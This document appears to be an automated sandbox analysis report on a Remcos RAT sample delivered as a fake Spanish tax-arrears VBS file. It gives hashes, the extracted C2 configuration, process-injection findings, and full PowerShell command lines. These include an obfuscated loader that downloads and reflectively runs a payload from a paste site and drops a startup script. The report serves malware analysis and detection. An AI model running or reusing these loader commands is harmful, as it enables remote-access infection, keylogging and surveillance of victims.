Analysis
- max time kernel: 150s
- max time network: 139s
- platform: windows10-2004_x64
- resource: win10v2004-20220901-en
- resource tags: arch:x64 arch:x86 image:win10v2004-20220901-en locale:en-us os:windows10-2004-x64 system
- submitted: 06-10-2022 10:10
Static task: static1
Behavioral task: behavioral1
- Sample: Administración Tributaria pagos atrasados.vbs
- Resource: win7-20220812-en
General
- Target: Administración Tributaria pagos atrasados.vbs
- Size: 201KB
- MD5: 0b4dc1bb49165555906e0a54ba35c40c
- SHA1: 5cc413e6b260a6d12f8cd7f89f60864d6616185f
- SHA256: 3a649ff19adaa0be44bdb367250683c93a350edf38b7ffb9d86559749b854fbc
- SHA512: 8100fb1ad8a3106d3eaeb7425b6c748b347384e2b5209a131cad325a53f031e7f9a8e4960117d4e5f026bbf985682e9fce07899404e75a23b4ccb1dd6971596b
- SSDEEP: 96:dyYRYFYDC3HFYSx9AXnXwEUfK2AUB/0zfNEWUvGcZ1+AN1qHk:d9uaYHFYH3AdfK2RB/0zfHcZJ1qE
Malware Config
Extracted
- URL: https://pasteio.com/download/xBVTIS53dQcN
Extracted
- Family: remcos
- Botnet: roda7
- C2: defenderos2.con-ip.com:2425
- audio_folder: MicRecords
- audio_record_time: 5
- connect_delay: 0
- connect_interval: 1
- copy_file: remcos.exe
- copy_folder: Remcos
- delete_file: false
- hide_file: false
- hide_keylog_file: true
- install_flag: false
- keylog_crypt: false
- keylog_file: r7uopsssa.dat
- keylog_flag: false
- keylog_path: %AppData%
- mouse_option: false
- mutex: Sbnsdcvvqq-54AH7S
- screenshot_crypt: false
- screenshot_flag: false
- screenshot_folder: Screenshots
- screenshot_path: %AppData%
- screenshot_time: 10
- startup_value: Remcos
- take_screenshot_option: false
- take_screenshot_time: 5
Signatures

Blocklisted process makes network request (3 IoCs)
Processes (flow, pid, process):
- flow 5, pid 3984, powershell.exe
- flow 9, pid 3984, powershell.exe
- flow 12, pid 3984, powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes (description, ioc, process):
- Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation (WScript.exe)

Drops startup file (2 IoCs)
Processes (description, ioc, process):
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d3vEukKaERTJu.vbs (powershell.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d3vEukKaERTJu.vbs (powershell.exe)

Suspicious use of SetThreadContext (1 IoC)
Processes (description, pid, process, target process):
- PID 3984 set thread context of 2916: powershell.exe (3984) -> RegSvcs.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes (pid, process):
- 2656 powershell.exe (2 entries)
- 3984 powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes (description, pid, process):
- Token: SeDebugPrivilege, pid 2656, powershell.exe
- Token: SeDebugPrivilege, pid 3984, powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes (pid, process):
- 2916 RegSvcs.exe

Suspicious use of WriteProcessMemory (16 IoCs)
Processes (description, pid, process, target process):
- PID 1496 wrote to memory of 2656: WScript.exe (1496) -> powershell.exe (2 entries)
- PID 2656 wrote to memory of 3984: powershell.exe (2656) -> powershell.exe (2 entries)
- PID 3984 wrote to memory of 2916: powershell.exe (3984) -> RegSvcs.exe (12 entries)
Processes
- C:\Windows\System32\WScript.exe (depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwCvAL0AvgDkAK8ArwClAL0AJwA7AFsAQgB5AHQAZQBbAF0AXQAgACQARABMAEwAIAA9ACAAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHAAYQBzAHQAZQBpAG8ALgBjAG8AbQAvAGQAbwB3AG4AbABvAGEAZAAvAHgAQgBWAFQASQBTAD⌚⌚⌚AMwBkAFEAYwBOACcAKQApADsAWwBzAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcATgB3AGcAbwB4AE0ALgBLAFAASgBhAE4AagAnACkALgBHAG⌚⌚⌚AdABNAG⌚⌚⌚AdABoAG8AZAAoACcA⌚⌚⌚ABVAGwARwBLAEEAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAMAAvAE⌚⌚⌚AdgAzAGQAMQAvAGQALwBlAG⌚⌚⌚ALgBlAHQAcwBhAHAALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBkADMAdgBFAH⌚⌚⌚AawBLAGEARQBSAFQASgB1ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('¯½¾ä¯¯¥½', 'C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\Administración Tributaria pagos atrasados.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pasteio.com/download/xBVTIS53dQcN'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('0/Ev3d1/d/ee.etsap//:sptth' , $RodaCopy , 'd3vEukKaERTJu' ))"
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (depth 4)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: f41839a3fe2888c8b3050197bc9a0a05
  SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 64B
  MD5: d8b9a260789a22d72263ef3bb119108c
  SHA1: 376a9bd48726f422679f2cd65003442c0b6f6dd5
  SHA256: d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
  SHA512: 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
- memory/2656-132-0x0000000000000000-mapping.dmp
- memory/2656-133-0x000001F02E1B0000-0x000001F02E1D2000-memory.dmp (Filesize: 136KB)
- memory/2656-144-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp (Filesize: 10.8MB)
- memory/2656-135-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp (Filesize: 10.8MB)
- memory/2916-138-0x00000000004327A4-mapping.dmp
- memory/2916-139-0x0000000000400000-0x000000000047F000-memory.dmp (Filesize: 508KB)
- memory/2916-141-0x0000000000400000-0x000000000047F000-memory.dmp (Filesize: 508KB)
- memory/2916-137-0x0000000000400000-0x000000000047F000-memory.dmp (Filesize: 508KB)
- memory/2916-145-0x0000000000400000-0x000000000047F000-memory.dmp (Filesize: 508KB)
- memory/2916-146-0x0000000000400000-0x000000000047F000-memory.dmp (Filesize: 508KB)
- memory/3984-140-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp (Filesize: 10.8MB)
- memory/3984-136-0x00007FFC52A60000-0x00007FFC53521000-memory.dmp (Filesize: 10.8MB)
- memory/3984-134-0x0000000000000000-mapping.dmp